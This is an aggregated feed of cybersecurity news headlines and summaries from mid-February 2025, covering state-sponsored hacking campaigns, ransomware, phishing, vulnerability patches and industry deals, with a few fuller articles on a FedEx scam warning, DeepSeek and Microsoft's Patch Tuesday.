2025-02-14 04:52:00
Government renames AI Safety Institute and teams up with Anthropic
by ComputerWeekly
2025-02-14 01:38:00
Product roadmap 2025: Enable and scale threat readiness with Hack The Box
How we plan to unlock epic wins for our customers through innovation, strategic releases, and data-driven insights.
by Hack The Box Blog
2025-02-14 01:26:53
The best free VPNs of 2025: Expert tested
Finding a trustworthy free VPN can be a real challenge. We tested the best free VPNs that offer solid services without invading your privacy.
by ZDNET Security
2025-02-14 00:00:00
Q&A: How Mastronardi Produce Secures Innovation with CrowdStrike
by CrowdStrike
2025-02-13 22:33:26
CyberArk Makes Identity Security Play With Zilla Acquisition
CyberArk announces the Zilla deal on the same day leading identity service provider SailPoint returns to the public markets.
by Dark Reading
2025-02-13 22:23:38
Roundtable: Is DOGE Flouting Cybersecurity for US Data?
Cybersecurity experts weigh in on the red flags flying around the new Department of Government Efficiency's handling of the mountains of US data it now has access to, potentially without basic information security protections in place.
by Dark Reading
2025-02-13 21:32:35
Chinese APT 'Emperor Dragonfly' Moonlights With Ransomware
Pivoting from prior cyber espionage, the threat group deployed its backdoor tool set to ultimately push out RA World malware, demanding $2 million from its victim.
by Dark Reading
2025-02-13 21:08:10
How AI was used in an advanced phishing campaign targeting Gmail users
Scammers are once again using AI to take over Gmail accounts.
by Malwarebytes Labs
2025-02-13 20:43:00
Hackers Use CAPTCHA Trick on Webflow CDN PDFs to Bypass Security Scanners
A widespread phishing campaign has been observed leveraging bogus PDF documents hosted on the Webflow content delivery network (CDN) with an aim to steal credit card information and commit financial fraud. "The attacker targets victims searching for documents on search engines, resulting in access to malicious PDF that contains a CAPTCHA image embedded with a phishing link, leading them to
by The Hacker News
2025-02-13 20:14:47
Nearly a Year Later, Mozilla is Still Promoting OneRep
In mid-March 2024, KrebsOnSecurity revealed that the founder of the personal data removal service Onerep also founded dozens of people-search companies. Shortly after that investigation was published, Mozilla said it would stop bundling Onerep with the Firefox browser and wind down its partnership. But nearly a year later, Mozilla is still promoting it to Firefox users.
by Krebs on Security
2025-02-13 19:56:00
North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks
A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors. The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet
by The Hacker News
2025-02-13 19:05:03
Changing the narrative on pig butchering scams
Hazel discusses Interpol’s push to rename pig butchering scams as ‘romance baiting’. Plus, catch up on the latest vulnerability research from Talos, and why a recent discovery is a “rare industry win”.
by Cisco Talos Blog
2025-02-13 18:42:10
Barracuda’s cybersecurity platform recognized for excellence
Barracuda is starting the year on a high note, with multiple new industry accolades that underscore our leadership in cybersecurity.
by Barracuda
2025-02-13 17:55:00
Fast Deployments, Secure Code: Watch this Learn to Sync Dev and Sec Teams
Ever felt like your team is stuck in a constant battle? Developers rush to add new features, while security folks worry about vulnerabilities. What if you could bring both sides together without sacrificing one for the other? We invite you to our upcoming webinar, "Opening the Fast Lane for Secure Deployments." This isn’t another tech talk full of buzzwords—it's a down-to-earth session that
by The Hacker News
2025-02-13 17:44:00
How to find your BitLocker recovery key - and save a secure backup copy before it's too late
BitLocker encryption is a great way to stop a thief from accessing your business and personal secrets. But don't let the tool lock you out of your PC.
by ZDNET Security
2025-02-13 17:28:00
RA World Ransomware Attack in South Asia Links to Chinese Espionage Toolset
An RA World ransomware attack in November 2024 targeting an unnamed Asian software and services company involved the use of a malicious tool exclusively used by China-based cyber espionage groups, raising the possibility that the threat actor may be moonlighting as a ransomware player in an individual capacity. "During the attack in late 2024, the attacker deployed a distinct toolset that had
by The Hacker News
2025-02-13 16:59:47
Valve removes Steam game that contained malware
The gaming giant told affected users: "Consider fully reformatting your operating system"
by TechCrunch
2025-02-13 16:50:07
Gone Phishing: Installing GoPhish and Creating a Campaign
GoPhish provides a nice platform for creating and running phishing campaigns. This blog will guide you through installing GoPhish and creating a campaign.
by Black Hills Information Security
2025-02-13 16:30:00
AI and Security - A New Puzzle to Figure Out
AI is everywhere now, transforming how businesses operate and how users engage with apps, devices, and services. A lot of applications now have some Artificial Intelligence inside, whether supporting a chat interface, intelligently analyzing data or matching user preferences. No question AI benefits users, but it also brings new security challenges, especially Identity-related security
by The Hacker News
2025-02-13 15:29:24
How AI Is Set To Transform Enterprise Communications
By dynamically providing relevant information in real time, assorted AI applications can ease friction in collaborative workspaces.
by ITPro Today
2025-02-13 15:26:10
New Phishing Campaign Targets The X Accounts of Politicians, Tech Companies, Cryptocurrency, And More
SentinelOne warns that a phishing campaign is targeting high-profile X accounts, including those belonging to US political figures, leading journalists, major technology companies, cryptocurrency organizations, and owners of coveted usernames.
by KnowBe4
2025-02-13 15:10:14
Spyware maker caught distributing malicious Android apps for years
Italian company SIO, which sells to government customers, is behind an Android spyware campaign called Spyrtacus that spoofed popular apps like WhatsApp, per security researchers.
by TechCrunch
2025-02-13 15:09:00
Palo Alto Networks Patches Authentication Bypass Exploit in PAN-OS Software
Palo Alto Networks has addressed a high-severity security flaw in its PAN-OS software that could result in an authentication bypass. The vulnerability, tracked as CVE-2025-0108, carries a CVSS score of 7.8 out of 10.0. The score, however, drops to 5.1 if access to the management interface is restricted to a jump box. "An authentication bypass in the Palo Alto Networks PAN-OS software enables an
by The Hacker News
2025-02-13 15:00:47
How Public & Private Sectors Can Better Align Cyber Defense
With investment in cybersecurity capabilities and proactive measures to address emerging challenges, we can work together to navigate the complexities of combating cybercrime.
by Dark Reading
2025-02-13 14:41:00
FINALDRAFT Malware Exploits Microsoft Graph API for Espionage on Windows and Linux
Threat hunters have shed light on a new campaign targeting the foreign ministry of an unnamed South American nation with bespoke malware capable of granting remote access to infected hosts. The activity, detected in November 2024, has been attributed by Elastic Security Labs to a threat cluster it tracks as REF7707. Some of the other targets include a telecommunications entity and a university,
by The Hacker News
2025-02-13 14:14:34
Protecting WhatsApp and Telegram accounts from hacking and hijacking in 2025 | Kaspersky official blog
We look into the methods of hijacking WhatsApp and Telegram accounts, and ways to protect yourself against them.
by Kaspersky
2025-02-13 14:00:00
Automatic Audit Logs: new updates deliver increased transparency and accountability
We’re excited to announce the beta release of Automatic Audit Logs, offering greater transparency and control.
by Cloudflare
2025-02-13 14:00:00
How red teaming helps safeguard the infrastructure behind AI models
Artificial intelligence (AI) is now squarely on the frontlines of information security. However, as is often the case when the pace of technological innovation is very rapid, security often ends up being a secondary consideration. This is increasingly evident from the ad-hoc nature of many implementations, where organizations lack a clear strategy for responsible AI […]
by Security Intelligence
2025-02-13 13:26:45
CyberArk snaps up Zilla Security for up to $175M
Identity security company CyberArk has acquired identity governance and administration (IGA) platform Zilla Security in a deal worth up to $175 million. The transaction consists of a $165 million cash portion and an additional $10 million “earn-out” which is payable upon meeting certain milestones — it can be seen as an incentive for the founders […]
by TechCrunch
2025-02-13 13:20:43
Azure RBAC Privilege Escalations: Azure VM
Microsoft Azure provides administrators with controls to limit the actions a principal can take within the cloud environment. These actions can broadly be split into two categories: those that impact the Entra ID tenant and those that affect the Azure cloud subscription, the latter of which we will call “RBAC actions.” Prior research into Entra […]
by Praetorian
2025-02-13 13:08:05
Hunters International Ransomware: Tactics, Impact, and Defense Strategies
Hunters International is a ransomware group that emerged in October 2023, operating under a Ransomware-as-a-Service (RaaS) model. The group has been responsible for over 200 attacks worldwide, targeting various industries and exfiltrating sensitive data before encrypting systems. Hunters International uses a Rust-based ransomware that shares similarities with the Hive ransomware but incorporates improvements in command-line options, key management, and encryption techniques.
by Picus Security
2025-02-13 13:02:13
How I got more than 100 vulnerabilities in just one site? (zseano-challenge)
0xM5awy thanks for the valuable content my friend. Cheers! 🥂
by HACKLIDO
2025-02-13 13:00:01
Why Darktrace / EMAIL excels against APTs
APTs are sophisticated threat actors with the resources to coordinate and achieve long-term objectives. Amidst the skyrocketing numbers of BEC attacks, every organization should be worried about the ability of intruders to infiltrate and exploit. This blog will look at several recent examples of complex email attacks and how Darktrace / EMAIL successfully disarmed and prevented intrusion.
by Darktrace
2025-02-13 12:54:00
UK accused of political ‘foreign cyber attack’ on US after serving secret snooping order on Apple
by ComputerWeekly
2025-02-13 12:50:00
Sophos lays off 6% of workforce following Secureworks acquisition
The layoffs come soon after Sophos completed its $859 million acquisition of Secureworks.
by TechCrunch
2025-02-13 12:25:05
FedEx Cautions Against New Wave of Scams, Urges Public Vigilance
FedEx, the world's largest express transportation company, is issuing an urgent public warning regarding a wave of FedEx scams that have recently emerged, particularly in India. These fraudulent activities, often involving the impersonation of FedEx employees, are leading victims into dangerous situations where they are tricked into transferring money and personal information under false pretenses.
With the rise of digital fraud, FedEx is emphasizing the importance of awareness and vigilance to avoid falling victim to these deceptive tactics. The company encourages everyone to be cautious, as these scams not only cause financial harm but can also result in emotional distress.
Understanding the FedEx Scams
The FedEx scams typically start with a phone call or a text message from someone pretending to be a FedEx courier representative. The fraudster falsely claims that the recipient’s parcel contains illegal or prohibited items. This claim is often followed by a threatening message from an individual pretending to be a law enforcement official. The fake officer will warn the recipient that legal action or even digital arrest will be pursued unless an immediate payment is made to clear the supposed charges.
These scammers create a false sense of urgency, pressuring their victims to act quickly. Once the victim sends the money, the perpetrators vanish, leaving the individual with a financial loss and no recourse.
Key Points to Remember
FedEx has notified users that the company will never ask for sensitive personal information, account details, or identity data via unsolicited mail, email, or text messages. The company has further clarified that it is not affiliated with any law enforcement agencies and does not act on their behalf to collect payments or resolve legal matters.
Customers are strongly urged to be wary of any unexpected communications that claim to represent FedEx or involve threats from fake law enforcement officials. The company also highlights the importance of never transferring money or sharing personal details when faced with unsolicited requests or threats of legal action.
What to Do If You’re Targeted
FedEx advises individuals who fall victim to such FedEx scams to report the incident immediately. Victims can reach out to the Cyber Crime Helpline by dialing 1930 or by visiting the official government website at cybercrime.gov.in. It is crucial to report these fraudulent activities as soon as possible in order to prevent further harm and assist law enforcement in tracking down the perpetrators.
FedEx provides a set of practical guidelines to help the public stay protected against these types of fraud:
- Always be cautious of unsolicited communications, especially if they claim to be from FedEx or other courier companies.
- Cross-check any suspicious phone calls, messages, or emails with official customer service channels. It's always better to verify through legitimate sources before taking any action.
- Never transfer money or share sensitive personal information without confirming the legitimacy of the request.
- If you encounter a potential FedEx scam, contact local law enforcement or report the incident via the Cyber Crime Helpline at 1930 or on cybercrime.gov.in.
Conclusion
As fraudulent activities continue to target victims, staying vigilant and informed is essential to protecting personal information and preventing fraud. To help consumers recognize and avoid scams, FedEx encourages individuals to visit their website or contact customer service for guidance. By adhering to safety tips and promptly reporting any suspicious activity, the public can play a crucial role in preventing these scams and securing themselves against fraudulent activities worldwide.
by The Cyber Express
2025-02-13 12:12:33
The Overlooked Art of Software Localization for Non-Traditional Markets
Despite software's global reach, many companies overlook a critical aspect of their development process: localization for non-traditional markets.
by ITPro Today
2025-02-13 12:05:02
Rethinking Automated Penetration Testing: Why Validation Changes Everything
Penetration testing has long been a core practice in cybersecurity, but the way that organizations conduct these assessments is changing. In a recent webinar featuring cybersecurity expert Hector Monsegur, we discussed a critical shift: how combining automated penetration testing with attack path mapping and validation can elevate security operations.
by Picus Security
2025-02-13 12:00:00
How To Fix Network Drive Issues in Elevated PowerShell Sessions
Watch this tutorial to learn about handling drive mappings in PowerShell, focusing on fixing inaccessible network drives in elevated sessions.
by ITPro Today
2025-02-13 11:39:28
Barcelona-based spyware startup Variston shuts down, per filing
Variston, a Barcelona-based spyware vendor, has reportedly shut down. Intelligence Online, a trade publication that covers the surveillance and intelligence industry, reports that a legal notice published in Barcelona's registry on February 10 confirmed that Variston has been liquidated. TechCrunch has also seen the legal notice saying Variston has shuttered. This comes almost a year […]
by TechCrunch
2025-02-13 11:35:00
EU Cyber Resilience Act: What does it mean for security & dev teams?
A guide to understanding the security-related implications of the EU Cyber Resilience Act.
by Hack The Box Blog
2025-02-13 11:14:20
FBI, CISA warn hackers abusing buffer overflow CVEs to launch attacks
The agencies are urging manufacturers to shift development practices through the use of memory safe code.
by Cybersecurity Dive
2025-02-13 11:00:00
The Loneliness Epidemic Is a Security Crisis
Romance scams cost victims hundreds of millions of dollars a year. As people grow increasingly isolated, and generative AI helps scammers scale their crimes, the problem could get worse.
by WIRED Security News
2025-02-13 10:55:00
XDR roundup 2024: Ransomware rises fourfold in a year of complex threats
In 2024, Barracuda Managed XDR logged many trillions of IT events to identify the critical security threats targeting organizations and neutralize malicious activity. Threat analysts in Barracuda Managed XDR's Security Operations Center (SOC) have drawn on this unique dataset to highlight the most common ways threat actors tried — and ultimately failed — to breach and disrupt targets in 2024.
by Barracuda
2025-02-13 10:41:04
China-backed hackers continue cyberattacks on telecom companies
Salt Typhoon threat actors compromised Cisco edge devices by exploiting older vulnerabilities.
by Cybersecurity Dive
2025-02-13 10:24:06
Nation-State Actors Increasingly Employ Ransomware Tactics
Recent analyses reveal that government-backed hacking groups are increasingly adopting ransomware techniques, not solely for financial gain but also to further their espionage objectives. This trend blurs the lines between traditional cybercriminals and state-sponsored actors, complicating attribution and defense efforts.
by Zendata
2025-02-13 10:10:00
I tested 10 AI content detectors - and these 3 correctly identified AI text every time
Some detectors are better at spotting AI-written text than others. Here's why these mixed results matter.
by ZDNET Security
2025-02-13 09:40:45
China's Salt Typhoon hackers continue to breach telecom firms despite US sanctions
Threat intelligence firm Recorded Future said it had observed Salt Typhoon breaching 5 telcos between December 2024 and January 2025.
by TechCrunch
2025-02-13 09:30:00
Frequently Asked Questions About DeepSeek Large Language Model (LLM)
The open-source LLM known as DeepSeek has attracted much attention in recent weeks with the release of DeepSeek V3 and DeepSeek R1, and in this blog, the Tenable Security Response Team answers some of the frequently asked questions (FAQ) about it.
Background
The Tenable Security Response Team (SRT) has compiled this blog to answer Frequently Asked Questions (FAQ) regarding DeepSeek.
FAQ
What is DeepSeek?
DeepSeek typically refers to the large language model (LLM) produced by a Chinese company named DeepSeek, founded in 2023 by Liang Wenfeng.
What is a large language model?
A large language model, or LLM, is a machine-learning model that has been pre-trained on a large corpus of data, which enables it to respond to user inputs using natural, human-like responses.
Why is there so much interest in the DeepSeek LLM?
In January 2025, DeepSeek published two new LLMs: DeepSeek V3 and DeepSeek R1. The interest surrounding these models is two-fold: first, they are open-source, meaning anyone can download and run these LLMs on their local machines and, second, they were reportedly trained using less-powerful hardware, which was believed to be a breakthrough in this space as it revealed that such models could be developed at a lower cost.
What are the differences between DeepSeek V3 and DeepSeek R1?
DeepSeek V3 is an LLM that employs a technique called mixture-of-experts (MoE), which requires less compute power because it only loads the required "experts" to respond to a prompt. It also implements a new technique called multi-head latent attention (MLA), which significantly reduces the memory usage and performance during training and inference (the process of generating a response from user input).
In addition to MoE and MLA, DeepSeek R1 implements a multi-token prediction (MTP) architecture first introduced by Meta. Instead of just predicting the next word each time the model is executed, DeepSeek R1 predicts the next two tokens in parallel.
DeepSeek R1 is an advanced LLM that utilizes reasoning, which includes chain-of-thought (CoT), revealing to the end user how it responds to each prompt. According to DeepSeek, performance of its R1 model "rivals" OpenAI's o1 model.
(Figure: Example of DeepSeek's chain-of-thought (CoT) reasoning model)
What are the minimum requirements to run a DeepSeek model locally?
It depends. DeepSeek R1 has 671 billion parameters and requires multiple expensive high-end GPUs to run. There are distilled versions of the model starting at 1.5 billion parameters, going all the way up to 70 billion parameters. These distilled models are able to run on consumer-grade hardware. Here is the size on disk for each model:
DeepSeek R1 model   Size on disk
1.5b                1.1 GB
7b                  4.4 GB
8b                  4.9 GB
14b                 9.0 GB
32b                 22 GB
70b                 43 GB
671b                404 GB
Therefore, the fewer the parameters, the fewer resources are required, and the more the parameters, the more resources are required. The number of parameters also influences how the model will respond to prompts by the user. Most modern computers, including laptops that have 8 to 16 gigabytes of RAM, are capable of running distilled LLMs with 7 billion or 8 billion parameters.
What makes DeepSeek different from other LLMs?
Benchmark testing conducted by DeepSeek showed that its DeepSeek R1 model is on par with many of the existing models from OpenAI, Claude and Meta at the time of its release. Additionally, many of the companies in this space have not open-sourced their frontier LLMs, which gives DeepSeek a unique advantage.
Finally, its CoT approach is verbose, revealing more of the nuances involved in how LLMs respond to prompts compared to other reasoning models. The latest models from OpenAI (o3) and Google (Gemini 2.0 Flash Thinking) reveal additional reasoning to the end user, though in a less verbose fashion.
What is a frontier model?
A frontier model refers to the most advanced LLMs available that include complex reasoning and problem-solving capabilities. Currently, OpenAI's o1 and o3 models along with DeepSeek R1 are the only frontier models available.
DeepSeek was created by a Chinese company. Is it safe to use?
It depends. Deploying the open-source version of DeepSeek on a system is likely safer to use versus DeepSeek's website or mobile applications, since it doesn't require a connection to the internet to function. However, there are genuine privacy and security concerns about using DeepSeek, specifically through its website and its mobile applications available on iOS and Android.
What are the concerns surrounding using DeepSeek's website and mobile applications?
DeepSeek's data collection disclosure is outlined in its privacy policy, which specifies the types of data collected when using its website or mobile applications. It's important to note that data is stored on secure servers in the People's Republic of China, although the retention terms are unclear. Since DeepSeek operates in China, its terms of service are subject to Chinese law, meaning that consumer privacy protections, such as the EU's GDPR and similar global regulations, do not apply. If you choose to download DeepSeek models and run them locally, you face a lower risk regarding data privacy.
Has DeepSeek been banned anywhere or is it being reviewed for a potential ban?
As of February 13, several countries have banned or are investigating DeepSeek for a potential ban, including Italy, Taiwan, South Korea and Australia. Several U.S. states, including Texas, New York and Virginia, have banned DeepSeek from government devices, along with several entities of the U.S. federal government including the U.S. Department of Defense, U.S. Navy and the U.S. Congress. This list is likely to continue to grow in the coming weeks and months.
Is Tenable looking into safety and security concerns surrounding LLMs like DeepSeek?
Yes, Tenable Research is actively researching LLMs, including DeepSeek, and will be sharing more of our findings in future publications on the Tenable blog.
Get more information
DeepSeek-R1: Incentivizing Reasoning Capability in LLMs via Reinforcement Learning
Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.
by Tenable
2025-02-13 06:40:00
Postquantum computing and Sectigo's QUANT strategy: securing the future
Quantum computing is poised to revolutionize industries by solving complex problems at speeds far beyond classical computers. While the potential benefits are immense, this technology also poses significant risks to current cryptographic systems that protect global digital infrastructure.
by Sectigo
2025-02-13 05:00:00
UK government sanctions target Russian cyber crime network Zservers
by ComputerWeekly
2025-02-13 05:00:00
China's Salt Typhoon Spies Are Still Hacking Telecoms—Now by Exploiting Cisco Routers
Despite high-profile attention and even US sanctions, the group hasn't stopped or even slowed its operation, including the breach of two more US telecoms.
by WIRED Security News
2025-02-13 02:00:00
Japan Goes on Offense With New 'Active Cyber Defense' Bill
Japan is on a mission to catch up to the US standard of national cyber preparedness, and its new legislation is a measure intended to stop escalating Chinese cyber-espionage efforts, experts say.
by Dark Reading
2025-02-13 00:00:00
CrowdStrike Leads Agentic AI Innovation in Cybersecurity with Charlotte AI Detection Triage
by CrowdStrike
2025-02-13 00:00:00
You've Got Malware: FINALDRAFT Hides in Your Drafts
During a recent investigation (REF7707), Elastic Security Labs discovered new malware targeting a foreign ministry. The malware includes a custom loader and backdoor with many features including using Microsoft's Graph API for C2 communications.
by Elastic Security Lab
2025-02-13 00:00:00
From South America to Southeast Asia: The Fragile Web of REF7707
REF7707 targeted a South American foreign ministry using novel malware families. Inconsistent evasion tactics and operational security missteps exposed additional adversary-owned infrastructure.
by Elastic Security Lab
2025-02-13 00:00:00
From Geopolitics to AI, 6 Key Threat Intelligence Trends for CISOs in 2025
Discover the latest threat intelligence outlooks for 2025, including AI-enabled phishing, SaaS attacks, and executive-targeted cyber threats. Learn key strategies to protect your organization from evolving digital risks.
by Recorded Future
2025-02-13 00:00:00
Munich Security Conference
Explore intelligence reports from Recorded Future's Insikt Group at the 2025 Munich Security Conference. Key topics include Taiwan invasion risk, Russian influence in German elections, RedMike exploiting Cisco devices, and North Korea's IT worker scam.
by Recorded Future
2025-02-13 00:00:00
Stimmen aus Moskau: Russian Influence Operations Target German Elections
Discover how Russia-linked influence operations, including Doppelgänger and Operation Overload, are attempting to undermine Germany's 2025 elections. Learn about their tactics, impacts, and how to mitigate the risks to media integrity and public trust.
by Recorded Future
2025-02-13 00:00:00
RedMike (Salt Typhoon) Exploits Vulnerable Cisco Devices of Global Telecommunications Providers
Discover how Chinese state-sponsored group RedMike exploited unpatched Cisco devices, targeting telecommunications providers globally. Learn about vulnerabilities CVE-2023-20198 and CVE-2023-20273, and how organizations can protect critical infrastructure.
by Recorded Future
2025-02-13 00:00:00
Inside the Scam: North Korea's IT Worker Threat
Learn how North Korea's IT workers infiltrate global companies, posing cybersecurity threats, committing fraud, and supporting the regime. Discover key findings and mitigation strategies to safeguard your business.
by Recorded Future
2025-02-12 23:02:31
President Trump to Nominate Former RNC Official as National Cyber Director
Sean Cairncross will be one of the primary advisers to the administration on national cybersecurity matters.
by Dark Reading
2025-02-12 22:32:00
Microsoft Uncovers Sandworm Subgroup's Global Cyber Attacks Spanning 15+ Countries
A subgroup within the infamous Russian state-sponsored hacking group known as Sandworm has been attributed to a multi-year initial access operation dubbed BadPilot that stretched across the globe. "This subgroup has conducted globally diverse compromises of Internet-facing infrastructure to enable Seashell Blizzard to persist on high-value targets and support tailored network operations," the
by The Hacker News
2025-02-12 20:45:00
Functions in PowerShell Scripts
This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell. A PowerShell function is a block of code designed to perform a specific task. Once a function is created and tested, it can be used in multiple scripts, reducing coding effort and risk of errors. Using well-named functions also makes scripts easier to read and maintain. And since functions can return values that can be … Continued
by Netwrix
2025-02-12 20:27:51
Content Credentials Technology Verifies Image, Video Authenticity
The open technology, which tackles disinformation, has gained steam in the past year, surpassing 500 corporate members and continuing to evolve.
by Dark Reading
2025-02-12 20:17:00
FAQ: New Malware Detection capability in Barracuda Cloud-to-Cloud Backup
Check out this FAQ-style blog on questions we received about Malware Detection for Barracuda Cloud-to-Cloud Backup at our recent webinar.
by Barracuda
2025-02-12 19:34:00
Researchers Find New Exploit Bypassing Patched NVIDIA Container Toolkit Vulnerability
Cybersecurity researchers have discovered a bypass for a now-patched security vulnerability in the NVIDIA Container Toolkit that could be exploited to break out of a container's isolation protections and gain complete access to the underlying host. The new vulnerability is being tracked as CVE-2025-23359 (CVSS score: 8.3). It affects the following versions - NVIDIA Container Toolkit (All
by The Hacker News
2025-02-12 19:30:41
Feds Sanction Russian Hosting Provider for Supporting LockBit Attacks
US, UK, and Australian law enforcement have targeted a company called Zservers (and two of its administrators) for providing bulletproof hosting services to the infamous ransomware gang.
by Dark Reading
2025-02-12 18:23:55
Domestic and international campaigns targeted PACE during Azerbaijan's 2024 suspension
During the suspension of the Azerbaijan delegation, anti-PACE narratives spread both domestically and internationally.
by DFRLab
2025-02-12 18:12:34
National Apprenticeship Week: Alternative Routes into Cyber
As National Apprenticeship Week shines a spotlight on career development opportunities, it's important to acknowledge that traditional apprenticeships aren't the only route into the cybersecurity industry. With cyber threats growing exponentially, the demand for skilled professionals has never been higher. Fortunately, alternative training programs, such as academies, internships, and specialised upskilling initiatives, are providing essential […]
by IT Security Guru
2025-02-12 18:10:18
Security compliance firm Drata acquires SafeBase for $250M
Drata, a security compliance automation platform that helps companies adhere to frameworks such as SOC 2 and GDPR, has acquired software security review startup SafeBase for $250 million. SafeBase co-founders Al Yang (CEO) and Adar Arnon (CTO) will retain their roles, and SafeBase will continue to offer a stand-alone product while bringing its core solutions to […]
by TechCrunch
2025-02-12 18:06:27
Microsoft Patch Tuesday for February Includes Two Zero Days Under Attack
Microsoft's Patch Tuesday for February 2025 fixes four zero-day vulnerabilities, including two under active attack, plus another eight flaws judged to be at high risk of attack. In all, the Patch Tuesday February 2025 release note lists 63 Microsoft CVEs and four non-Microsoft CVEs, three of which are for Chromium-based Microsoft Edge. The highest-rated vulnerability, CVE-2025-21198, a 9.0-severity Microsoft High Performance Compute (HPC) Pack Remote Code Execution vulnerability, was judged to be at lower risk for exploitation because it requires network access. After January's record 159 vulnerabilities, which included eight zero days and another 17 vulnerabilities at risk of exploitation, the February 2025 Patch Tuesday list seemed like something of a break in comparison.
Microsoft Zero-Days Under Attack
The actively exploited vulnerabilities include CVE-2025-21391, a Windows Storage Elevation of Privilege Vulnerability, and CVE-2025-21418, a Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability. CVE-2025-21391 is a 7.1-rated Link Following vulnerability that doesn't allow disclosure of confidential information, but Microsoft said an attacker could delete data that results in the service being unavailable. No further information was released on the vulnerability. CVE-2025-21418 is a 7.8-severity Heap-based Buffer Overflow vulnerability that could allow an attacker to gain system privileges. It was disclosed anonymously. The other zero days revealed by Microsoft include CVE-2025-21194, a 7.1-rated Microsoft Surface Security Feature Bypass vulnerability that requires multiple conditions for exploitation; and CVE-2025-21377, a 6.5-severity NTLM Hash Disclosure Spoofing vulnerability. The Surface vulnerability was rated as less likely to be exploited, while the NTLM flaw was rated "Exploitation More Likely."
Patch Tuesday February 2025 Vulnerabilities at High Risk of Attack
In addition to the three zero days actively under attack or at risk of attack, an additional eight vulnerabilities were rated as "Exploitation More Likely." The eight range in severity from 7.0 to 8.1 on the CVSS v3.1 scoring system. They include:
- CVE-2025-21419, a Windows Setup Files Cleanup Elevation of Privilege vulnerability
- CVE-2025-21420, a Windows Disk Cleanup Tool Elevation of Privilege vulnerability
- CVE-2025-21400, an 8.0-rated Microsoft SharePoint Server Remote Code Execution vulnerability
- CVE-2025-21414, CVE-2025-21184, and CVE-2025-21358, all of which are Windows Core Messaging Elevation of Privilege vulnerabilities that could allow an attacker to gain system privileges
- CVE-2025-21367, a Windows Win32 Kernel Subsystem Elevation of Privilege vulnerability
- CVE-2025-21376, an 8.1-rated Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution vulnerability
Other Vendors Issuing Patch Tuesday Updates
Patch Tuesday isn't just for Microsoft, of course, as several other vendors also released updates. A partial list includes: Adobe, Apple, AMD, Android, Fortinet, Ivanti, Palo Alto Networks, SAP, SolarWinds.
by The Cyber Express
2025-02-12 17:47:02
Google Tag Manager Skimmer Steals Credit Card Information From Magento Sites
Executive Summary
A recent investigation by Sucuri uncovered a sophisticated credit card skimmer on a Magento-based eCommerce website, leveraging Google Tag Manager (GTM) to inject malicious JavaScript and steal payment details. The malware was hidden within the cms_block.content database table, allowing attackers to discreetly intercept checkout page transactions. Further analysis by Sucuri revealed a backdoor in the...
by RH-ISAC
2025-02-12 17:29:00
Don't ignore Microsoft's February Patch Tuesday - it's a big one for all Windows 11 users
The latest updates resolve more glitches and security flaws - some critical - in Windows 11 23H2 and 24H2, so you'll want to install them sooner rather than later.
by ZDNET Security
2025-02-12 17:00:14
Google Family Link now limits who can contact your child's device
The parental control app just added several new features to help you keep your kids safer.
by ZDNET Security
2025-02-12 17:00:00
Microsoft: Russia's Sandworm APT Exploits Edge Bugs Globally
Sandworm (aka Seashell Blizzard) has an initial access wing called "BadPilot" that uses standard intrusion tactics to spread Russia's tendrils around the world.
by Dark Reading
2025-02-12 17:00:00
A Hacker Group Within Russia's Notorious Sandworm Unit Is Breaching Western Networks
A team Microsoft calls BadPilot is acting as Sandworm's "initial access operation," the company says. And over the last year it's trained its sights on the US, the UK, Canada, and Australia.
by WIRED Security News
2025-02-12 16:54:47
RH-ISAC Announces Agenda for the 2025 Cyber Intelligence Summit
VIENNA, VA (January 21, 2025) – The Retail & Hospitality Information Sharing and Analysis Center (RH-ISAC) has released the full agenda for its upcoming annual Cyber Intelligence Summit, the premier event for cybersecurity professionals working in retail, hospitality, and other consumer-facing industries. Scheduled to take place on 7-9 April in St. Louis, Missouri, the conference...
by RH-ISAC
2025-02-12 16:50:00
How to Steer AI Adoption: A CISO Guide
CISOs are finding themselves more involved in AI teams, often leading the cross-functional effort and AI strategy. But there aren't many resources to guide them on what their role should look like or what they should bring to these meetings. We've pulled together a framework for security leaders to help push AI teams and committees further in their AI adoption—providing them with the
by The Hacker News
2025-02-12 16:13:00
North Korean Hackers Exploit PowerShell Trick to Hijack Devices in New Cyberattack
The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets into running PowerShell as an administrator and then instructing them to paste and run malicious code provided by them. "To execute this tactic, the threat actor masquerades as a South Korean government official and over time builds rapport with a target before sending a
by The Hacker News